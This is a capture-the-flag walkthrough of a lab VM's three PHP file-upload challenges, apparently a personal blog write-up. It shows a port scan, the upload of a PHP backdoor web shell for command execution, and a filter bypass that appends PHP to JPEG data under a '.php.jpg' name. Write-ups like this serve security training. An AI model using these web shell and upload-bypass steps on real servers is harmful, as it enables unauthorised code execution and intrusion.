This VM contains 3 web application challenges, which focus on file upload and filter bypass.
Only ports 22 and 80 are open.
[email protected]:~# nmap -n -p- -A 192.168.56.102 PORT STATE SERVICE VERSION 22/tcp open ssh (protocol 2.0) | ssh-hostkey: | 1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA) | 2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA) |_ 256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port22-TCP:V=6.47%I=7%D=4/9%Time=5526DEE1%P=x86_64-unknown-linux-gnu%r( SF:NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Let’s head over to port 80 in a web browser.
I downloaded an image off the Internet and uploaded it to the server.
The file uploads, which is good, but now I need to find it…
/tmp/phpsu5a08 was not valid (404), as was
/tmp/rastamouse.jpg. So now it’s time to break out the web fuzzers! I didn’t get any hits with my usual
wfuzz wordlists, but I did with
The interesting directory is
uploads2, though it turns out this is the directory for challenge 2. So I manually tried
uploads1 and found
I took a copy of
/usr/share/webshells/php/php-simple-backdoor.php and uploaded it as
catflap1.php. This was uploaded successfully, so it seems this level has no filtering or protection in place at all.
[email protected]:~# curl http://192.168.56.102/uploads1/catflap1.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Attempting to upload the same PHP file for level 2 fails miserably.
If we intercept the request with
burp, we can see there’s a
Content-Disposition header. Note the
filename, we will change this later.
I sent the POST to Burp Repeater and tried various things to get PHP uploaded. After a few tried, I found that the following combination worked: Injecting PHP code at the end of the image data and modifying the file extension (to force the server to process the PHP data).
Content-Disposition: form-data; name="upfile"; filename="rastamouse.php.jpg"
When you access the URL, the binary data for the image is display in gibberish, but at the very bottom the successful PHP is shown.
[email protected]:~# curl http://192.168.56.102/uploads2/rastamouse.php.jpg
curl http://192.168.56.102/uploads2/rastamouse.php.jpg?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data)
To create the same file outside of Burp, it’s as simple as:
[email protected]:~/vulnhub/zorz/2# cat rastamouse.jpg catflap2.php > catflap2.php.jpg
It turns out that my file for Level 2 worked for Level 3 as well. That was easy ^_^.
So let’s collect the flag.
$ ls -l drwxr-xr-x 2 root root 4096 Feb 18 22:45 l337saucel337 $ ls -l l337saucel337 -rw-r--r-- 1 root root 400 Feb 18 22:45 SECRETFILE $ cat l337saucel337/SECRETFILE Great job so far. This box has 3 uploaders. The first 2 are pure php, the last one is php w/jquery. To get credit for this challenge, please submit a write-up or instructions on how you compromised the uploader or uploaders. If you solve 1, 2, or all of the uploader challenges, feel free to shoot me an email and let me know! [email protected] Thanks for playing! http://www.top-hat-sec.com